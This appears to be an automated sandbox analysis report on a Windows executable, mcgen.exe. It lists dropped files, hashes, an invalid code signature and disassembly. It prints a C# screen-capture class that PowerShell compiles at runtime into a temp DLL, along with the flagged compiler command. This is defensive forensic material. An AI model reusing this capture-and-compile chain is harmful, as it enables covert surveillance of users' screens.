                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                                                                                                                  Entropy (8bit):3.0946889386629204
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFTak7Ynqqm8PN5Dlq5J:+RI+ycuZhNPTakSm8PNnqX
                                                                                                                                                                                                                                                                  MD5:581C9F2A81E8B57BCF9684B564229B40
                                                                                                                                                                                                                                                                  SHA1:2F2DAB5DEC9B4BAE16BEB7F77A38A56CFE4D89C9
                                                                                                                                                                                                                                                                  SHA-256:ADA3BD297375EC558513E755D6A42B1789EC06952024F7297D557191A1B695D5
                                                                                                                                                                                                                                                                  SHA-512:0916D828FFD83E9EAAFCBE4AA19516BC77437FAB84EB3430B2231EC4AA3D7F5BD4ABACA17BB00235B11C3910367E39582F91428B299D08C9A7A2A4C653663A61
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.p.w.2.w.i.p.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.p.w.2.w.i.p.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1004
                                                                                                                                                                                                                                                                  Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                                                  MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                                                  SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                                                  SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                                                  SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (610), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):613
                                                                                                                                                                                                                                                                  Entropy (8bit):5.31480928341981
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ik/aew+WZETaeg9:V3ka6KOkqeFk/aX/ETaD
                                                                                                                                                                                                                                                                  MD5:DC86CED59DCB63F8952BBADEF5C5BCE3
                                                                                                                                                                                                                                                                  SHA1:B74978C71ED66A88571B8B1EF94131D83D81AF23
                                                                                                                                                                                                                                                                  SHA-256:789663961F9120312C6071862E342B70FBB748229AEE3AED1E6305CF0EF68BA9
                                                                                                                                                                                                                                                                  SHA-512:82D789E60C5DA622AB100CDC5BB37DAC5B9BEE400F28E435A135E11B5195936631ECC11A7219E6F0DDC25DB967C40FFAEC8A895DC27EB930A365AC7087EBFFB8
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.0.cs"
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                                                                                                                  Entropy (8bit):3.155216368752039
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:6U7oEAtf0KhzBU/zzf6mtJIN0KpW1ulra3nq:sNz0zGmAOYZK
                                                                                                                                                                                                                                                                  MD5:448894E619C75D1C82E2BF7A61CC29A1
                                                                                                                                                                                                                                                                  SHA1:C16DEBDE6AFB5A8192E120BC392A717D0DA1D2C9
                                                                                                                                                                                                                                                                  SHA-256:E6A28D3613ADC9F0E6A519BA018953FEB0A8733D250F628E58B5B1F8D7B72F1E
                                                                                                                                                                                                                                                                  SHA-512:66C12D55476025DCF4BE7C57574A682B041A87A23E312F20DCD6054AA72D383C0010CDDCD0F204FA28CD9A49830180429390F6835DE40BFEE15A827B8DF2DB66
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....evg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (717), with CRLF, CR line terminators
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):1158
                                                                                                                                                                                                                                                                  Entropy (8bit):5.471343013033898
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:KOalId3ka6KOkqeFk/aX/ETaiKax5DqBVKVrdFAMBJTH:+lkka6NkqeFkSX/E+iK2DcVKdBJj
                                                                                                                                                                                                                                                                  MD5:A0C3CFA85585001FA604B59FF909D7AF
                                                                                                                                                                                                                                                                  SHA1:47CD1812327E1D948261D722C014B8346D5625CF
                                                                                                                                                                                                                                                                  SHA-256:751521660F0AE1C13FE3D3CFA44489DB8BD8419A2D027AB46508D5A7F8E655B9
                                                                                                                                                                                                                                                                  SHA-512:868E191ED7465AE3DDD6A9220E36346D2D673D707314C6251E9314CA210BC5112CAC089761A55AB5E3C83633C0847862E0B15BC32D607FCE95A088DDA836ED10
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                  Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                                                  MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                                                  SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                                                  SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                                                  SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..Service Version: 0.0.0.0..user Version: 0.0.0.0....No user/signature is currently loaded...
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):311
                                                                                                                                                                                                                                                                  Entropy (8bit):4.798660615109549
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:Pz9AvmWxHLTSJALTSJALTSrcsWTo6wGv+wAFeMmvVOIHJFxMVlmJHaVFEG1vv:PpA5pTcgTcgTLs4omvtAFSkIrxMVlmJO
                                                                                                                                                                                                                                                                  MD5:EEB977516479625E459C02E8933317B3
                                                                                                                                                                                                                                                                  SHA1:F4A42A1DE54936B10BC1FE1018682F21DDAF2357
                                                                                                                                                                                                                                                                  SHA-256:2565EE1E830BBDE6F0F2CE4C2A32F5F42FF099DD280DE470BF38A3A7E788F47E
                                                                                                                                                                                                                                                                  SHA-512:0716E40DE67287CE498303B0E20C4B3F8E50779E3E3C676F7265689503A20EFEC20E65FE416682E197D1C471953BD23EA0C67DE62806B038D24F94D103EE9591
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..Pinging 585948 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                                                                                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Entropy (8bit):7.993430293629784
                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                  File name:mcgen.exe
                                                                                                                                                                                                                                                                  File size:8'042'981 bytes
                                                                                                                                                                                                                                                                  MD5:211da2d6a5b8b04b49d1c837eecee46c
                                                                                                                                                                                                                                                                  SHA1:4abdbb0e47fc77ec67348f73e47e526dbdd1dc1f
                                                                                                                                                                                                                                                                  SHA256:17e89140548fc71f7670ea5ee7df6feab0101386b8d087a81056ac6812d77a51
                                                                                                                                                                                                                                                                  SHA512:0f9d7205546694ce505d13195873851eece8dfb32234ca8f9551e780e576a3c6f4b54a79f5a9c3e93441fb4a9d65875263f6bd4acc03dc5644d6af9ead2f5dc8
                                                                                                                                                                                                                                                                  SSDEEP:196608:WKD+kduwfI9jUCBB7m+mKOY7rXrZusooDmhfvsbnTNWH:B5zIHL7HmBYXrYoaUNo
                                                                                                                                                                                                                                                                  TLSH:5686338666C144FAF837A83DD9818A1BCB327E255730DAD7437447B54EB3AE0487A327
                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..
                                                                                                                                                                                                                                                                  Icon Hash:e32fa4ab4bb64947
                                                                                                                                                                                                                                                                  Entrypoint:0x14000ce20
                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                  Time Stamp:0x67751E27 [Wed Jan 1 10:51:19 2025 UTC]
                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                  Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                                                                                  Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                                                                                  • 29/09/2021 02:00:00 29/09/2024 01:59:59
                                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                                  • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                                  Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                                                                  Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                                                                  Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                                                                  Serial:00BFB15001BBF592D4962A7797EA736FA3
                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                                                                                  call 00007FE7F46BB4ACh
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                                                                                  jmp 00007FE7F46BB0CFh
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                                                                                  call 00007FE7F46BB878h
                                                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                                                  je 00007FE7F46BB273h
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                  jmp 00007FE7F46BB257h
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  cmp ecx, eax
                                                                                                                                                                                                                                                                  je 00007FE7F46BB266h
                                                                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                                                                                  jne 00007FE7F46BB240h
                                                                                                                                                                                                                                                                  xor al, al
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                                  mov al, 01h
                                                                                                                                                                                                                                                                  jmp 00007FE7F46BB249h
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                                                                                  test ecx, ecx
                                                                                                                                                                                                                                                                  jne 00007FE7F46BB259h
                                                                                                                                                                                                                                                                  mov byte ptr [000356F5h], 00000001h
                                                                                                                                                                                                                                                                  call 00007FE7F46BA9A5h
                                                                                                                                                                                                                                                                  call 00007FE7F46BBC90h
                                                                                                                                                                                                                                                                  test al, al
                                                                                                                                                                                                                                                                  jne 00007FE7F46BB256h
                                                                                                                                                                                                                                                                  xor al, al
                                                                                                                                                                                                                                                                  jmp 00007FE7F46BB266h
                                                                                                                                                                                                                                                                  call 00007FE7F46C87AFh
                                                                                                                                                                                                                                                                  test al, al
                                                                                                                                                                                                                                                                  jne 00007FE7F46BB25Bh
                                                                                                                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                                                                                                                  call 00007FE7F46BBCA0h
                                                                                                                                                                                                                                                                  jmp 00007FE7F46BB23Ch
                                                                                                                                                                                                                                                                  mov al, 01h
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                  inc eax
                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  sub esp, 20h
                                                                                                                                                                                                                                                                  cmp byte ptr [000356BCh], 00000000h
                                                                                                                                                                                                                                                                  mov ebx, ecx
                                                                                                                                                                                                                                                                  jne 00007FE7F46BB2B9h
                                                                                                                                                                                                                                                                  cmp ecx, 01h
                                                                                                                                                                                                                                                                  jnbe 00007FE7F46BB2BCh
                                                                                                                                                                                                                                                                  call 00007FE7F46BB7EEh
                                                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                                                  je 00007FE7F46BB27Ah
                                                                                                                                                                                                                                                                  test ebx, ebx
                                                                                                                                                                                                                                                                  jne 00007FE7F46BB276h
                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                  lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                                                                                  call 00007FE7F46C85A2h
                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca340x78.rdata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x103e8.rsrc
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2238.pdata
